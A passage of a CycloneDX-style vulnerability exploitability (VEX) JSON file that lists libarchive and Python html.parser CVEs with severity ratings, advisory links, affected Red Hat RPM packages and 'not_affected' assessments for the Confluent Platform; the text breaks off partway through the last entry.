          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-5915",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.6,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        122
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw can lead to a heap buffer over-read due to the size of a filter block potentially exceeding the Lempel-Ziv-Storer-Schieber (LZSS) window. This means the library may attempt to read beyond the allocated memory buffer, which can result in unpredictable program behavior, crashes (denial of service), or the disclosure of sensitive information from adjacent memory regions.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5915"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5915"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370865"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2599"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5915"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7601-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5915"
        }
      ],
      "published": "2025-06-09T20:15:26+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5916",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw involves an integer overflow that can be triggered when processing a Web Archive (WARC) file that claims to have more than INT64_MAX - 4 content bytes. An attacker could craft a malicious WARC archive to induce this overflow, potentially leading to unpredictable program behavior, memory corruption, or a denial-of-service condition within applications that process such archives using libarchive. This bug affects libarchive versions prior to 3.8.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5916"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5916"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370872"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2568"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2568/commits/bce70c4c26864df2a8d6953e7db6e4b156253508"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5916"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7601-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5916"
        }
      ],
      "published": "2025-06-09T20:15:27+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5917",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw involves an 'off-by-one' miscalculation when handling prefixes and suffixes for file names. This can lead to a 1-byte write overflow. While seemingly small, such an overflow can corrupt adjacent memory, leading to unpredictable program behavior, crashes, or in specific circumstances, could be leveraged as a building block for more sophisticated exploitation. This bug affects libarchive versions prior to 3.8.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5917"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5917"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370874"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2588"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5917"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7601-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5917"
        }
      ],
      "published": "2025-06-09T20:15:27+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5918",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw can be triggered when file streams are piped into bsdtar, potentially allowing for reading past the end of the file. This out-of-bounds read can lead to unintended consequences, including unpredictable program behavior, memory corruption, or a denial-of-service condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5918"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5918"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370877"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2584"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5918"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5918"
        }
      ],
      "published": "2025-06-09T20:15:27+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-6069",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1333
      ],
      "description": "The html.parser.HTMLParser class had worse-case quadratic complexity when processing certain crafted malformed inputs potentially leading to amplified denial-of-service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-6069"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23342"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-6069"
        },
        {
          "url": "https://bugzilla.redhat.com/2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5642"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6069"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
